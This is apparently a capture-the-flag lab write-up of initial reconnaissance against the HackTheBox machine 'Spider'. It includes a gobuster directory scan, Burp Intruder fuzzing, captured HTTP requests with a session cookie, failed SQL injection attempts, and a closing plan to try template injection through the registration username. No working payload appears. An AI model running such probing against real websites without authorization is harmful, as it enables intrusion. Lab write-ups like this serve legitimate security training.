2 :80 SSTI via /register to /user
http://spider.htb/
Zeta Furniture website
# view source contains
| <!-- We have enabled rate limiting to keep pesky hax0rs from attacking our service. -->
$ gobuster dir -u http://spider.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/login (Status: 200) [Size: 1832]
/register (Status: 200) [Size: 2130]
/main (Status: 302) [Size: 219] [--> http://spider.htb/login]
/index (Status: 200) [Size: 11273]
/user (Status: 302) [Size: 219] [--> http://spider.htb/login]
/view (Status: 302) [Size: 219] [--> http://spider.htb/login]
/cart (Status: 500) [Size: 290]
/logout (Status: 302) [Size: 209] [--> http://spider.htb/]
/checkout (Status: 500) [Size: 290]
# only 2 pages are accessible without logging in
http://spider.htb/login
Admin Login
requires
| Username (UUID given at registration!)
| password
# default creds failing;
| ERROR: Unable to login.
http://spider.htb/register
Register Page
# registering as kashz:kashz
# reponse
You should be redirected automatically to target URL: <a href="/login?uuid=39643204-192c-4bb8-88d2-61dc81de7510">/login?uuid=39643204-192c-4bb8-88d2-61dc81de7510</a>
# creds
# UUID: 39643204-192c-4bb8-88d2-61dc81de7510
# kashz:kashz
# trying to explore it
http://spider.htb/product-details/1
Chair posted by user 'chiv'.This is a beautiful chair, finest quality, previously owned by Mitnick.
# all other chair links 1-6 are replicas for 1(white chair), 2 (black chair)
# running burp intruder for number 1-50
# when running burp intruder and exploring at the same time, we get ERROR
Too Many Requests
1 per 1 second
# nothing in 1-50
http://spider.htb/main > http://spider.htb/login
# nothing new
http://spider.htb/view
This is the messages board.
Current user: kashz
The admin board is empty!
# after logging in we see new section on left user information
http://spider.htb/user
See our username and UUID
# subscribe at the bottom takes a field
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
email=kashz%40kahsz.com
# tried sqli nothing here.
# adding chairs to cart
POST /product-details/1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
quantity=1&new_item=1
# tried sqli nothing here.
# removing chair from cart
GET /cart?remove=1 HTTP/1.1
Cookie: session=eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo
# tried sqli nothing here.
http://spider.htb/user
shows the username,
maybe inject that using SSTI in /registerSSTI
Last updated